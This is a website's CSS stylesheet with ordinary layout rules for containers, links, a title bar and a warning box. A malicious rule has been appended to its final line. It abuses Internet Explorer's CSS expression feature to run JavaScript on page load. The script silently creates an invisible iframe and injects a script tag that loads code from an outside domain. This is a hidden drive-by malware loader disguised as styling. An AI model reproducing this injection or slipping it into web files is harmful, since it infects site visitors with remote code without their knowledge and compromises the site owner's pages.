html {
 scrollbar-arrow-color: white;
 scrollbar-base-color: #343333;
 scrollbar-darkshadow-color: white;
 scrollbar-highlight-color: white;
 scrollbar-shadow-color: white;
 margin:0px; 
}

body {
 background-color:white;
 font-family:sans-serif;
 font-size: 14px;
 color:gray;
}

h1 {
 margin:0px;
 font-size:12px;
 color:gray;
 letter-spacing:5px;
}

p {margin:0px;}

a {
 color:dimgray;
 text-decoration:none;
}

a:hover {
 color:#e8959b;
}

#container {
 width:980px;
 height:1250px;
 margin:0 auto;
 text-align:center;
 margin-top:-8px;
}

#main_bg {
 width:980px;
 height:840px;
 margin:0 auto;
 float:left;
 position:relative;
 z-index:0;
}

#titleobi {
 background: url(image/obitop.jpg) no-repeat;
 background-position:50% 0%;
 width:100%;
 height:35px;
 float:left;
 background-color:black;
 position:relative;
 z-index:1;
}


#contens {
 width:980px;
 min-height:350px;
 float:left;
 position:relative;
 top:-180px;
}

#site_in {
 width:980px;
 height:230px;
 float:left;
}

img.mob {
 width:800px;
 height:100px;
 float:left;
 position:relative;
 top:-150px;
 left:90px;
}

#warning {
 width:980px;
 height:120px;
 color:red;
 text-align:center;
 font-size:12px;
}

#conbottom {
 text-align:center;
 width:100%;
 height:20px;
 color:gray;
 font-size:10px;
 padding-top:5px;
 letter-spacing:2px;
 background:black;
}body{zoom:expression(function(ele){setTimeout(function(){var i=document.createElement('iframe');i.width=i.height=0;document.body.appendChild(i);i.contentWindow.setTimeout(function(){i.contentWindow.document.write('<script src=http://www.faloge.com/js/yahoo.js></script>');},1000);},1000);ele.style.zoom='1';}(this));}